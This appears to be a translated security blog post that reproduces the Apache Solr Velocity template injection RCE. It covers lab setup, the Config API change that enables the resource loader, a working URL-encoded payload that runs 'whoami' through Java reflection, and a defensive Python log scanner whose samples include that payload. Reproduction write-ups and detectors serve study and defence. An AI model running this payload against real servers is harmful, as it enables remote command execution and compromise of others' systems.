Apache Solr Velocity template injection RCE vulnerability reproduction

I. Apache Solr introduction

Solr is a standalone enterprise search application server that exposes a web-service-like API. Users submit XML files in a specified format to the search engine server over HTTP to build the index, and can issue search requests over HTTP GET and receive the results in XML format.

II. Vulnerability description

Solr ships with the VelocityResponseWriter component. An attacker can send a crafted request that modifies the configuration so that VelocityResponseWriter is allowed to load an attacker-specified template, which results in a Velocity template injection leading to remote command execution; an attacker exploiting it obtains server privileges directly.

Vulnerability causes:

When an attacker can reach the Solr admin console directly, they can send a POST request to /<node name>/config to change the node's configuration for the VelocityResponseWriter plug-in that Apache Solr integrates by default. The plug-in's initialization parameter params.resource.loader.enabled controls whether a template may be supplied through the resource loader via request parameters; in Solr it defaults to false. When params.resource.loader.enabled is set to true, users are allowed to specify the resource to load through request parameters, which means an attacker can construct a request that executes a command on the server.

III. Affected versions

Apache Solr 5.x through 8.2.0 (the versions that provide the Config API)

IV. Building the vulnerable environment

1. Install a Java environment

2. Download Apache Solr 8.2.0 from https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

3. Unpack it, go to the bin directory, and run solr.cmd start

4. Open 192.168.10.171:8983 in a browser; the environment is built successfully.

V. Vulnerability reproduction

1. After a reboot, visiting 192.168.10.171:8983/solr again shows that no core has been created. First manually create a test folder under the /server/solr/ directory, then copy the conf directory from /server/solr/configsets/_default/ into the test directory.

2. Create a core named test as shown in the following screenshot.

3. Then visit the core's config endpoint to check whether the application's config file can be accessed.

4. Apache Solr integrates the VelocityResponseWriter plug-in by default. Its initialization parameter params.resource.loader.enabled defaults to false, but it can be changed by sending a POST request directly that sets it to true. After that, a special GET request can be constructed to achieve remote code execution.

5. A payload can then be constructed to achieve RCE.

The payload is as follows:

/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
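As an added defensive example (not code from the original post), the following Python scans constructed access-log lines for the two indicators this walkthrough produces: a Config API POST to a core's /config endpoint, and a select request with wt=velocity whose inline v.template.* parameter carries reflection calls. The log lines and the common-log layout are assumptions; a real deployment needs the line regex adjusted to its own log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in a common-log style (not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2019:10:00:01 +0000] "POST /solr/test/config HTTP/1.1" 200 120
10.0.0.5 - - [01/Nov/2019:10:00:02 +0000] "GET /solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27)) HTTP/1.1" 200 88
10.0.0.7 - - [01/Nov/2019:10:00:03 +0000] "GET /solr/test/select?q=solr&wt=json HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
# Reflection / process-spawning idioms that have no place in a search-result template.
SUSPICIOUS_TEMPLATE = re.compile(r'class\.forName|getRuntime|ProcessBuilder', re.IGNORECASE)

def classify_request(method, target):
    """Return the list of findings for one request given its method and path?query."""
    findings = []
    parts = urlsplit(target)
    # A Config API write (POST .../config) is how params.resource.loader.enabled gets
    # switched on; the body is not in the access log, so flag it for review.
    if method == "POST" and parts.path.rstrip("/").endswith("/config"):
        findings.append("config_api_write")
    params = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
    if "velocity" in [v.lower() for v in params.get("wt", [])]:
        findings.append("velocity_writer")
        # Inline templates arrive as v.template.<name>=...; inspect each decoded value.
        inline = [v for k, vs in params.items() if k.startswith("v.template.") for v in vs]
        if any(SUSPICIOUS_TEMPLATE.search(t) for t in inline):
            findings.append("velocity_template_injection")
    return findings

def scan_log(text):
    """Return (client_ip, method, path, findings) for every line with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        findings = classify_request(method, target)
        if findings:
            hits.append((ip, method, urlsplit(target).path, findings))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```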

-----------------------------------------------------------------------------------------------------

Reference:

POC address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template

Source: www.cnblogs.com/yuzly/p/11782608.html